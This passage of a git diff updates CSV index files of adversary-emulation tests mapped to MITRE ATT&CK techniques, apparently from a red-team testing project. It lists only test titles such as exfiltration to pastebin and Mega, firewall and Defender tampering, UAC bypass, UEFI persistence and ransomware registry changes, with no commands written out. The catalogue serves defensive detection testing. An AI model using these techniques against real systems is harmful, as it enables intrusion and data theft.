 exfiltration,T1567.003,Exfiltration Over Web Service: Exfiltration to Text Storage Sites,1,Exfiltrate data with HTTP POST to text storage sites - pastebin.com (Windows),c2e8ab6e-431e-460a-a2aa-3bc6a32022e3,powershell
 exfiltration,T1567.002,Exfiltration Over Web Service: Exfiltration to Cloud Storage,1,Exfiltrate data with rclone to cloud Storage - Mega (Windows),8529ee44-279a-4a19-80bf-b846a40dda58,powershell
 exfiltration,T1030,Data Transfer Size Limits,1,Data Transfer Size Limits,ab936c51-10f4-46ce-9144-e02137b2016a,sh
+exfiltration,T1030,Data Transfer Size Limits,2,Network-Based Data Transfer in Small Chunks,f0287b58-f4bc-40f6-87eb-692e126e7f8f,powershell
 exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,1,Exfiltration Over Alternative Protocol - HTTP,1d1abbd6-a3d3-4b2e-bef5-c59293f46eff,manual
 exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,2,Exfiltration Over Alternative Protocol - ICMP,dd4b4421-2e25-4593-90ae-7021947ad12e,powershell
 exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,3,Exfiltration Over Alternative Protocol - DNS,c403b5a4-b5fc-49f2-b181-d1c80d27db45,manual
diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv
index 578468e4..a0c62e2e 100644
--- a/atomics/Indexes/Indexes-CSV/linux-index.csv
+++ b/atomics/Indexes/Indexes-CSV/linux-index.csv
@@ -97,16 +97,16 @@ defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,4,Logging Configur
 defense-evasion,T1036.004,Masquerading: Masquerade Task or Service,3,linux rename /proc/pid/comm using prctl,f0e3aaea-5cd9-4db6-a077-631dd19b27a8,sh
 defense-evasion,T1562.010,Impair Defenses: Downgrade Attack,1,ESXi - Change VIB acceptance level to CommunitySupported via PowerCLI,062f92c9-28b1-4391-a5f8-9d8ca6852091,powershell
 defense-evasion,T1562.010,Impair Defenses: Downgrade Attack,2,ESXi - Change VIB acceptance level to CommunitySupported via ESXCLI,14d55b96-b2f5-428d-8fed-49dc4d9dd616,command_prompt
-defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
-defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,2,Disable history collection (freebsd),cada55b4-8251-4c60-819e-8ec1b33c9306,sh
-defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,3,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
-defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,4,Clear bash history,878794f7-c511-4199-a950-8c28b3ed8e5b,bash
-defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,5,Setting the HISTCONTROL environment variable,10ab786a-028e-4465-96f6-9e83ca6c5f24,bash
-defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,6,Setting the HISTFILESIZE environment variable,5cafd6c1-2f43-46eb-ac47-a5301ba0a618,bash
-defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,7,Setting the HISTSIZE environment variable,386d3850-2ce7-4508-b56b-c0558922c814,sh
-defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,8,Setting the HISTFILE environment variable,b3dacb6c-a9e3-44ec-bf87-38db60c5cad1,bash
-defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,9,Setting the HISTFILE environment variable (freebsd),f7308845-6da8-468e-99f2-4271f2f5bb67,sh
-defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,10,Setting the HISTIGNORE environment variable,f12acddb-7502-4ce6-a146-5b62c59592f1,bash
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,2,Disable history collection (freebsd),cada55b4-8251-4c60-819e-8ec1b33c9306,sh
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,3,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,4,Clear bash history,878794f7-c511-4199-a950-8c28b3ed8e5b,bash
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,5,Setting the HISTCONTROL environment variable,10ab786a-028e-4465-96f6-9e83ca6c5f24,bash
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,6,Setting the HISTFILESIZE environment variable,5cafd6c1-2f43-46eb-ac47-a5301ba0a618,bash
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,7,Setting the HISTSIZE environment variable,386d3850-2ce7-4508-b56b-c0558922c814,sh
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,8,Setting the HISTFILE environment variable,b3dacb6c-a9e3-44ec-bf87-38db60c5cad1,bash
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,9,Setting the HISTFILE environment variable (freebsd),f7308845-6da8-468e-99f2-4271f2f5bb67,sh
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,10,Setting the HISTIGNORE environment variable,f12acddb-7502-4ce6-a146-5b62c59592f1,bash
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,1,Disable syslog,4ce786f8-e601-44b5-bfae-9ebb15a7d1c8,sh
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,2,Disable syslog (freebsd),db9de996-441e-4ae0-947b-61b6871e2fdf,sh
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,3,Disable Cb Response,ae8943f7-0f8d-44de-962d-fbc2e2f03eb8,sh
diff --git a/atomics/Indexes/Indexes-CSV/macos-index.csv b/atomics/Indexes/Indexes-CSV/macos-index.csv
index 93002f0e..70b33bca 100644
--- a/atomics/Indexes/Indexes-CSV/macos-index.csv
+++ b/atomics/Indexes/Indexes-CSV/macos-index.csv
@@ -57,8 +57,8 @@ defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,5
 defense-evasion,T1647,Plist File Modification,1,Plist Modification,394a538e-09bb-4a4a-95d1-b93cf12682a8,manual
 defense-evasion,T1564.002,Hide Artifacts: Hidden Users,1,Create Hidden User using UniqueID < 500,4238a7f0-a980-4fff-98a2-dfc0a363d507,sh
 defense-evasion,T1564.002,Hide Artifacts: Hidden Users,2,Create Hidden User using IsHidden option,de87ed7b-52c3-43fd-9554-730f695e7f31,sh
-defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
-defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,3,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,3,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,6,Disable Carbon Black Response,8fba7766-2d11-4b4a-979a-1e3d9cc9a88c,sh
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,7,Disable LittleSnitch,62155dd8-bb3d-4f32-b31c-6532ff3ac6a3,sh
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,8,Disable OpenDNS Umbrella,07f43b33-1e15-4e99-be70-bc094157c849,sh
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 9d30266e..e60ffc1f 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -13,6 +13,7 @@ defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,10,Execution o
 defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,11,Rundll32 with Ordinal Value,9fd5a74b-ba89-482a-8a3e-a5feaa3697b0,command_prompt
 defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,12,Rundll32 with Control_RunDLL,e4c04b6f-c492-4782-82c7-3bf75eb8077e,command_prompt
 defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,13,Rundll32 with desk.cpl,83a95136-a496-423c-81d3-1c6750133917,command_prompt
+defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,14,Running DLL with .init extension and function,2d5029f0-ae20-446f-8811-e7511b58e8b6,command_prompt
 defense-evasion,T1216.001,Signed Script Proxy Execution: Pubprn,1,PubPrn.vbs Signed Script Bypass,9dd29a1f-1e16-4862-be83-913b10a88f6c,command_prompt
 defense-evasion,T1006,Direct Volume Access,1,Read volume boot sector via DOS device path (PowerShell),88f6327e-51ec-4bbf-b2e8-3fea534eab8b,powershell
 defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt
@@ -41,6 +42,7 @@ defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account
 defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,24,Disable UAC - Switch to the secure desktop when prompting for elevation via registry key,85f3a526-4cfa-4fe7-98c1-dea99be025c7,powershell
 defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,25,Disable UAC notification via registry keys,160a7c77-b00e-4111-9e45-7c2a44eda3fd,command_prompt
 defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,26,Disable ConsentPromptBehaviorAdmin via registry keys,a768aaa2-2442-475c-8990-69cf33af0f4e,command_prompt
+defense-evasion,T1542.001,Pre-OS Boot: System Firmware,1,UEFI Persistence via Wpbbin.exe File Creation,b8a49f03-e3c4-40f2-b7bb-9e8f8fdddbf1,powershell
 defense-evasion,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
 defense-evasion,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
 defense-evasion,T1036.005,Masquerading: Match Legitimate Name or Location,2,Masquerade as a built-in system executable,35eb8d16-9820-4423-a2a1-90c4f5edd9ca,powershell
@@ -144,76 +146,78 @@ defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,6,A
 defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,20,LockBit Black - Unusual Windows firewall registry modification -cmd,a4651931-ebbb-4cde-9363-ddf3d66214cb,command_prompt
 defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,21,LockBit Black - Unusual Windows firewall registry modification -Powershell,80b453d1-eec5-4144-bf08-613a6c3ffe12,powershell
 defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,22,Blackbit - Disable Windows Firewall using netsh firewall,91f348e6-3760-4997-a93b-2ceee7f254ee,command_prompt
+defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,23,ESXi - Disable Firewall via Esxcli,bac8a340-be64-4491-a0cc-0985cb227f5a,command_prompt
 defense-evasion,T1553.003,Subvert Trust Controls: SIP and Trust Provider Hijacking,1,SIP (Subject Interface Package) Hijacking via Custom DLL,e12f5d8d-574a-4e9d-8a84-c0e8b4a8a675,command_prompt
 defense-evasion,T1207,Rogue Domain Controller,1,DCShadow (Active Directory),0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6,powershell
 defense-evasion,T1112,Modify Registry,1,Modify Registry of Current User Profile - cmd,1324796b-d0f6-455a-b4ae-21ffee6aa6b9,command_prompt
 defense-evasion,T1112,Modify Registry,2,Modify Registry of Local Machine - cmd,282f929a-6bc5-42b8-bd93-960c3ba35afe,command_prompt
 defense-evasion,T1112,Modify Registry,3,Modify registry to store logon credentials,c0413fb5-33e2-40b7-9b6f-60b29f4a7a18,command_prompt
-defense-evasion,T1112,Modify Registry,4,Add domain to Trusted sites Zone,cf447677-5a4e-4937-a82c-e47d254afd57,powershell
-defense-evasion,T1112,Modify Registry,5,Javascript in registry,15f44ea9-4571-4837-be9e-802431a7bfae,powershell
-defense-evasion,T1112,Modify Registry,6,Change Powershell Execution Policy to Bypass,f3a6cceb-06c9-48e5-8df8-8867a6814245,powershell
-defense-evasion,T1112,Modify Registry,7,BlackByte Ransomware Registry Changes - CMD,4f4e2f9f-6209-4fcf-9b15-3b7455706f5b,command_prompt
-defense-evasion,T1112,Modify Registry,8,BlackByte Ransomware Registry Changes - Powershell,0b79c06f-c788-44a2-8630-d69051f1123d,powershell
-defense-evasion,T1112,Modify Registry,9,Disable Windows Registry Tool,ac34b0f7-0f85-4ac0-b93e-3ced2bc69bb8,command_prompt
-defense-evasion,T1112,Modify Registry,10,Disable Windows CMD application,d2561a6d-72bd-408c-b150-13efe1801c2a,powershell
-defense-evasion,T1112,Modify Registry,11,Disable Windows Task Manager application,af254e70-dd0e-4de6-9afe-a994d9ea8b62,command_prompt
-defense-evasion,T1112,Modify Registry,12,Disable Windows Notification Center,c0d6d67f-1f63-42cc-95c0-5fd6b20082ad,command_prompt
-defense-evasion,T1112,Modify Registry,13,Disable Windows Shutdown Button,6e0d1131-2d7e-4905-8ca5-d6172f05d03d,command_prompt
-defense-evasion,T1112,Modify Registry,14,Disable Windows LogOff Button,e246578a-c24d-46a7-9237-0213ff86fb0c,command_prompt
-defense-evasion,T1112,Modify Registry,15,Disable Windows Change Password Feature,d4a6da40-618f-454d-9a9e-26af552aaeb0,command_prompt
-defense-evasion,T1112,Modify Registry,16,Disable Windows Lock Workstation Feature,3dacb0d2-46ee-4c27-ac1b-f9886bf91a56,command_prompt
-defense-evasion,T1112,Modify Registry,17,Activate Windows NoDesktop Group Policy Feature,93386d41-525c-4a1b-8235-134a628dee17,command_prompt
-defense-evasion,T1112,Modify Registry,18,Activate Windows NoRun Group Policy Feature,d49ff3cc-8168-4123-b5b3-f057d9abbd55,command_prompt
-defense-evasion,T1112,Modify Registry,19,Activate Windows NoFind Group Policy Feature,ffbb407e-7f1d-4c95-b22e-548169db1fbd,command_prompt
-defense-evasion,T1112,Modify Registry,20,Activate Windows NoControlPanel Group Policy Feature,a450e469-ba54-4de1-9deb-9023a6111690,command_prompt
-defense-evasion,T1112,Modify Registry,21,Activate Windows NoFileMenu Group Policy Feature,5e27bdb4-7fd9-455d-a2b5-4b4b22c9dea4,command_prompt
-defense-evasion,T1112,Modify Registry,22,Activate Windows NoClose Group Policy Feature,12f50e15-dbc6-478b-a801-a746e8ba1723,command_prompt
-defense-evasion,T1112,Modify Registry,23,Activate Windows NoSetTaskbar Group Policy Feature,d29b7faf-7355-4036-9ed3-719bd17951ed,command_prompt
-defense-evasion,T1112,Modify Registry,24,Activate Windows NoTrayContextMenu Group Policy Feature,4d72d4b1-fa7b-4374-b423-0fe326da49d2,command_prompt
-defense-evasion,T1112,Modify Registry,25,Activate Windows NoPropertiesMyDocuments Group Policy Feature,20fc9daa-bd48-4325-9aff-81b967a84b1d,command_prompt
-defense-evasion,T1112,Modify Registry,26,Hide Windows Clock Group Policy Feature,8023db1e-ad06-4966-934b-b6a0ae52689e,command_prompt
-defense-evasion,T1112,Modify Registry,27,Windows HideSCAHealth Group Policy Feature,a4637291-40b1-4a96-8c82-b28f1d73e54e,command_prompt
-defense-evasion,T1112,Modify Registry,28,Windows HideSCANetwork Group Policy Feature,3e757ce7-eca0-411a-9583-1c33b8508d52,command_prompt
-defense-evasion,T1112,Modify Registry,29,Windows HideSCAPower Group Policy Feature,8d85a5d8-702f-436f-bc78-fcd9119496fc,command_prompt
-defense-evasion,T1112,Modify Registry,30,Windows HideSCAVolume Group Policy Feature,7f037590-b4c6-4f13-b3cc-e424c5ab8ade,command_prompt
-defense-evasion,T1112,Modify Registry,31,Windows Modify Show Compress Color And Info Tip Registry,795d3248-0394-4d4d-8e86-4e8df2a2693f,command_prompt
-defense-evasion,T1112,Modify Registry,32,Windows Powershell Logging Disabled,95b25212-91a7-42ff-9613-124aca6845a8,command_prompt
-defense-evasion,T1112,Modify Registry,33,Windows Add Registry Value to Load Service in Safe Mode without Network,1dd59fb3-1cb3-4828-805d-cf80b4c3bbb5,command_prompt
-defense-evasion,T1112,Modify Registry,34,Windows Add Registry Value to Load Service in Safe Mode with Network,c173c948-65e5-499c-afbe-433722ed5bd4,command_prompt
-defense-evasion,T1112,Modify Registry,35,Disable Windows Toast Notifications,003f466a-6010-4b15-803a-cbb478a314d7,command_prompt
-defense-evasion,T1112,Modify Registry,36,Disable Windows Security Center Notifications,45914594-8df6-4ea9-b3cc-7eb9321a807e,command_prompt
-defense-evasion,T1112,Modify Registry,37,Suppress Win Defender Notifications,c30dada3-7777-4590-b970-dc890b8cf113,command_prompt
-defense-evasion,T1112,Modify Registry,38,Allow RDP Remote Assistance Feature,86677d0e-0b5e-4a2b-b302-454175f9aa9e,command_prompt
-defense-evasion,T1112,Modify Registry,39,NetWire RAT Registry Key Creation,65704cd4-6e36-4b90-b6c1-dc29a82c8e56,command_prompt
-defense-evasion,T1112,Modify Registry,40,Ursnif Malware Registry Key Creation,c375558d-7c25-45e9-bd64-7b23a97c1db0,command_prompt
-defense-evasion,T1112,Modify Registry,41,Terminal Server Client Connection History Cleared,3448824b-3c35-4a9e-a8f5-f887f68bea21,command_prompt
-defense-evasion,T1112,Modify Registry,42,Disable Windows Error Reporting Settings,d2c9e41e-cd86-473d-980d-b6403562e3e1,command_prompt
-defense-evasion,T1112,Modify Registry,43,DisallowRun Execution Of Certain Applications,71db768a-5a9c-4047-b5e7-59e01f188e84,command_prompt
-defense-evasion,T1112,Modify Registry,44,Enabling Restricted Admin Mode via Command_Prompt,fe7974e5-5813-477b-a7bd-311d4f535e83,command_prompt
-defense-evasion,T1112,Modify Registry,45,Mimic Ransomware - Enable Multiple User Sessions,39f1f378-ba8a-42b3-96dc-2a6540cfc1e3,command_prompt
-defense-evasion,T1112,Modify Registry,46,Mimic Ransomware - Allow Multiple RDP Sessions per User,35727d9e-7a7f-4d0c-a259-dc3906d6e8b9,command_prompt
-defense-evasion,T1112,Modify Registry,47,Event Viewer Registry Modification - Redirection URL,6174be7f-5153-4afd-92c5-e0c3b7cdb5ae,command_prompt
-defense-evasion,T1112,Modify Registry,48,Event Viewer Registry Modification - Redirection Program,81483501-b8a5-4225-8b32-52128e2f69db,command_prompt
-defense-evasion,T1112,Modify Registry,49,Enabling Remote Desktop Protocol via Remote Registry,e3ad8e83-3089-49ff-817f-e52f8c948090,command_prompt
-defense-evasion,T1112,Modify Registry,50,Disable Win Defender Notification,12e03af7-79f9-4f95-af48-d3f12f28a260,command_prompt
-defense-evasion,T1112,Modify Registry,51,Disable Windows OS Auto Update,01b20ca8-c7a3-4d86-af59-059f15ed5474,command_prompt
-defense-evasion,T1112,Modify Registry,52,Disable Windows Auto Reboot for current logon user,396f997b-c5f8-4a96-bb2c-3c8795cf459d,command_prompt
-defense-evasion,T1112,Modify Registry,53,Windows Auto Update Option to Notify before download,335a6b15-b8d2-4a3f-a973-ad69aa2620d7,command_prompt
-defense-evasion,T1112,Modify Registry,54,Do Not Connect To Win Update,d1de3767-99c2-4c6c-8c5a-4ba4586474c8,command_prompt
-defense-evasion,T1112,Modify Registry,55,Tamper Win Defender Protection,3b625eaa-c10d-4635-af96-3eae7d2a2f3c,command_prompt
-defense-evasion,T1112,Modify Registry,56,Snake Malware Registry Blob,8318ad20-0488-4a64-98f4-72525a012f6b,powershell
-defense-evasion,T1112,Modify Registry,57,Allow Simultaneous Download Registry,37950714-e923-4f92-8c7c-51e4b6fffbf6,command_prompt
-defense-evasion,T1112,Modify Registry,58,Modify Internet Zone Protocol Defaults in Current User Registry - cmd,c88ef166-50fa-40d5-a80c-e2b87d4180f7,command_prompt
-defense-evasion,T1112,Modify Registry,59,Modify Internet Zone Protocol Defaults in Current User Registry - PowerShell,b1a4d687-ba52-4057-81ab-757c3dc0d3b5,powershell
-defense-evasion,T1112,Modify Registry,60,Activities To Disable Secondary Authentication Detected By Modified Registry Value.,c26fb85a-fa50-4fab-a64a-c51f5dc538d5,command_prompt
-defense-evasion,T1112,Modify Registry,61,Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value.,ffeddced-bb9f-49c6-97f0-3d07a509bf94,command_prompt
-defense-evasion,T1112,Modify Registry,62,Scarab Ransomware Defense Evasion Activities,ca8ba39c-3c5a-459f-8e15-280aec65a910,command_prompt
-defense-evasion,T1112,Modify Registry,63,Disable Remote Desktop Anti-Alias Setting Through Registry,61d35188-f113-4334-8245-8c6556d43909,command_prompt
-defense-evasion,T1112,Modify Registry,64,Disable Remote Desktop Security Settings Through Registry,4b81bcfa-fb0a-45e9-90c2-e3efe5160140,command_prompt
-defense-evasion,T1112,Modify Registry,65,Disabling ShowUI Settings of Windows Error Reporting (WER),09147b61-40f6-4b2a-b6fb-9e73a3437c96,command_prompt
-defense-evasion,T1112,Modify Registry,66,Enable Proxy Settings,eb0ba433-63e5-4a8c-a9f0-27c4192e1336,command_prompt
-defense-evasion,T1112,Modify Registry,67,Set-Up Proxy Server,d88a3d3b-d016-4939-a745-03638aafd21b,command_prompt
-defense-evasion,T1112,Modify Registry,68,RDP Authentication Level Override,7e7b62e9-5f83-477d-8935-48600f38a3c6,command_prompt
+defense-evasion,T1112,Modify Registry,4,Use Powershell to Modify registry to store logon credentials,68254a85-aa42-4312-a695-38b7276307f8,powershell
+defense-evasion,T1112,Modify Registry,5,Add domain to Trusted sites Zone,cf447677-5a4e-4937-a82c-e47d254afd57,powershell
+defense-evasion,T1112,Modify Registry,6,Javascript in registry,15f44ea9-4571-4837-be9e-802431a7bfae,powershell
+defense-evasion,T1112,Modify Registry,7,Change Powershell Execution Policy to Bypass,f3a6cceb-06c9-48e5-8df8-8867a6814245,powershell
+defense-evasion,T1112,Modify Registry,8,BlackByte Ransomware Registry Changes - CMD,4f4e2f9f-6209-4fcf-9b15-3b7455706f5b,command_prompt
+defense-evasion,T1112,Modify Registry,9,BlackByte Ransomware Registry Changes - Powershell,0b79c06f-c788-44a2-8630-d69051f1123d,powershell
+defense-evasion,T1112,Modify Registry,10,Disable Windows Registry Tool,ac34b0f7-0f85-4ac0-b93e-3ced2bc69bb8,command_prompt
+defense-evasion,T1112,Modify Registry,11,Disable Windows CMD application,d2561a6d-72bd-408c-b150-13efe1801c2a,powershell
+defense-evasion,T1112,Modify Registry,12,Disable Windows Task Manager application,af254e70-dd0e-4de6-9afe-a994d9ea8b62,command_prompt
+defense-evasion,T1112,Modify Registry,13,Disable Windows Notification Center,c0d6d67f-1f63-42cc-95c0-5fd6b20082ad,command_prompt
+defense-evasion,T1112,Modify Registry,14,Disable Windows Shutdown Button,6e0d1131-2d7e-4905-8ca5-d6172f05d03d,command_prompt
+defense-evasion,T1112,Modify Registry,15,Disable Windows LogOff Button,e246578a-c24d-46a7-9237-0213ff86fb0c,command_prompt
+defense-evasion,T1112,Modify Registry,16,Disable Windows Change Password Feature,d4a6da40-618f-454d-9a9e-26af552aaeb0,command_prompt
+defense-evasion,T1112,Modify Registry,17,Disable Windows Lock Workstation Feature,3dacb0d2-46ee-4c27-ac1b-f9886bf91a56,command_prompt
+defense-evasion,T1112,Modify Registry,18,Activate Windows NoDesktop Group Policy Feature,93386d41-525c-4a1b-8235-134a628dee17,command_prompt
+defense-evasion,T1112,Modify Registry,19,Activate Windows NoRun Group Policy Feature,d49ff3cc-8168-4123-b5b3-f057d9abbd55,command_prompt
+defense-evasion,T1112,Modify Registry,20,Activate Windows NoFind Group Policy Feature,ffbb407e-7f1d-4c95-b22e-548169db1fbd,command_prompt
+defense-evasion,T1112,Modify Registry,21,Activate Windows NoControlPanel Group Policy Feature,a450e469-ba54-4de1-9deb-9023a6111690,command_prompt
+defense-evasion,T1112,Modify Registry,22,Activate Windows NoFileMenu Group Policy Feature,5e27bdb4-7fd9-455d-a2b5-4b4b22c9dea4,command_prompt
+defense-evasion,T1112,Modify Registry,23,Activate Windows NoClose Group Policy Feature,12f50e15-dbc6-478b-a801-a746e8ba1723,command_prompt
+defense-evasion,T1112,Modify Registry,24,Activate Windows NoSetTaskbar Group Policy Feature,d29b7faf-7355-4036-9ed3-719bd17951ed,command_prompt
+defense-evasion,T1112,Modify Registry,25,Activate Windows NoTrayContextMenu Group Policy Feature,4d72d4b1-fa7b-4374-b423-0fe326da49d2,command_prompt
+defense-evasion,T1112,Modify Registry,26,Activate Windows NoPropertiesMyDocuments Group Policy Feature,20fc9daa-bd48-4325-9aff-81b967a84b1d,command_prompt
+defense-evasion,T1112,Modify Registry,27,Hide Windows Clock Group Policy Feature,8023db1e-ad06-4966-934b-b6a0ae52689e,command_prompt
+defense-evasion,T1112,Modify Registry,28,Windows HideSCAHealth Group Policy Feature,a4637291-40b1-4a96-8c82-b28f1d73e54e,command_prompt
+defense-evasion,T1112,Modify Registry,29,Windows HideSCANetwork Group Policy Feature,3e757ce7-eca0-411a-9583-1c33b8508d52,command_prompt
+defense-evasion,T1112,Modify Registry,30,Windows HideSCAPower Group Policy Feature,8d85a5d8-702f-436f-bc78-fcd9119496fc,command_prompt
+defense-evasion,T1112,Modify Registry,31,Windows HideSCAVolume Group Policy Feature,7f037590-b4c6-4f13-b3cc-e424c5ab8ade,command_prompt
+defense-evasion,T1112,Modify Registry,32,Windows Modify Show Compress Color And Info Tip Registry,795d3248-0394-4d4d-8e86-4e8df2a2693f,command_prompt
+defense-evasion,T1112,Modify Registry,33,Windows Powershell Logging Disabled,95b25212-91a7-42ff-9613-124aca6845a8,command_prompt
+defense-evasion,T1112,Modify Registry,34,Windows Add Registry Value to Load Service in Safe Mode without Network,1dd59fb3-1cb3-4828-805d-cf80b4c3bbb5,command_prompt
+defense-evasion,T1112,Modify Registry,35,Windows Add Registry Value to Load Service in Safe Mode with Network,c173c948-65e5-499c-afbe-433722ed5bd4,command_prompt
+defense-evasion,T1112,Modify Registry,36,Disable Windows Toast Notifications,003f466a-6010-4b15-803a-cbb478a314d7,command_prompt
+defense-evasion,T1112,Modify Registry,37,Disable Windows Security Center Notifications,45914594-8df6-4ea9-b3cc-7eb9321a807e,command_prompt
+defense-evasion,T1112,Modify Registry,38,Suppress Win Defender Notifications,c30dada3-7777-4590-b970-dc890b8cf113,command_prompt
+defense-evasion,T1112,Modify Registry,39,Allow RDP Remote Assistance Feature,86677d0e-0b5e-4a2b-b302-454175f9aa9e,command_prompt
+defense-evasion,T1112,Modify Registry,40,NetWire RAT Registry Key Creation,65704cd4-6e36-4b90-b6c1-dc29a82c8e56,command_prompt
+defense-evasion,T1112,Modify Registry,41,Ursnif Malware Registry Key Creation,c375558d-7c25-45e9-bd64-7b23a97c1db0,command_prompt
+defense-evasion,T1112,Modify Registry,42,Terminal Server Client Connection History Cleared,3448824b-3c35-4a9e-a8f5-f887f68bea21,command_prompt
+defense-evasion,T1112,Modify Registry,43,Disable Windows Error Reporting Settings,d2c9e41e-cd86-473d-980d-b6403562e3e1,command_prompt
+defense-evasion,T1112,Modify Registry,44,DisallowRun Execution Of Certain Applications,71db768a-5a9c-4047-b5e7-59e01f188e84,command_prompt
+defense-evasion,T1112,Modify Registry,45,Enabling Restricted Admin Mode via Command_Prompt,fe7974e5-5813-477b-a7bd-311d4f535e83,command_prompt
+defense-evasion,T1112,Modify Registry,46,Mimic Ransomware - Enable Multiple User Sessions,39f1f378-ba8a-42b3-96dc-2a6540cfc1e3,command_prompt
+defense-evasion,T1112,Modify Registry,47,Mimic Ransomware - Allow Multiple RDP Sessions per User,35727d9e-7a7f-4d0c-a259-dc3906d6e8b9,command_prompt
+defense-evasion,T1112,Modify Registry,48,Event Viewer Registry Modification - Redirection URL,6174be7f-5153-4afd-92c5-e0c3b7cdb5ae,command_prompt
+defense-evasion,T1112,Modify Registry,49,Event Viewer Registry Modification - Redirection Program,81483501-b8a5-4225-8b32-52128e2f69db,command_prompt
+defense-evasion,T1112,Modify Registry,50,Enabling Remote Desktop Protocol via Remote Registry,e3ad8e83-3089-49ff-817f-e52f8c948090,command_prompt
+defense-evasion,T1112,Modify Registry,51,Disable Win Defender Notification,12e03af7-79f9-4f95-af48-d3f12f28a260,command_prompt
+defense-evasion,T1112,Modify Registry,52,Disable Windows OS Auto Update,01b20ca8-c7a3-4d86-af59-059f15ed5474,command_prompt
+defense-evasion,T1112,Modify Registry,53,Disable Windows Auto Reboot for current logon user,396f997b-c5f8-4a96-bb2c-3c8795cf459d,command_prompt
+defense-evasion,T1112,Modify Registry,54,Windows Auto Update Option to Notify before download,335a6b15-b8d2-4a3f-a973-ad69aa2620d7,command_prompt
+defense-evasion,T1112,Modify Registry,55,Do Not Connect To Win Update,d1de3767-99c2-4c6c-8c5a-4ba4586474c8,command_prompt
+defense-evasion,T1112,Modify Registry,56,Tamper Win Defender Protection,3b625eaa-c10d-4635-af96-3eae7d2a2f3c,command_prompt
+defense-evasion,T1112,Modify Registry,57,Snake Malware Registry Blob,8318ad20-0488-4a64-98f4-72525a012f6b,powershell
+defense-evasion,T1112,Modify Registry,58,Allow Simultaneous Download Registry,37950714-e923-4f92-8c7c-51e4b6fffbf6,command_prompt
+defense-evasion,T1112,Modify Registry,59,Modify Internet Zone Protocol Defaults in Current User Registry - cmd,c88ef166-50fa-40d5-a80c-e2b87d4180f7,command_prompt
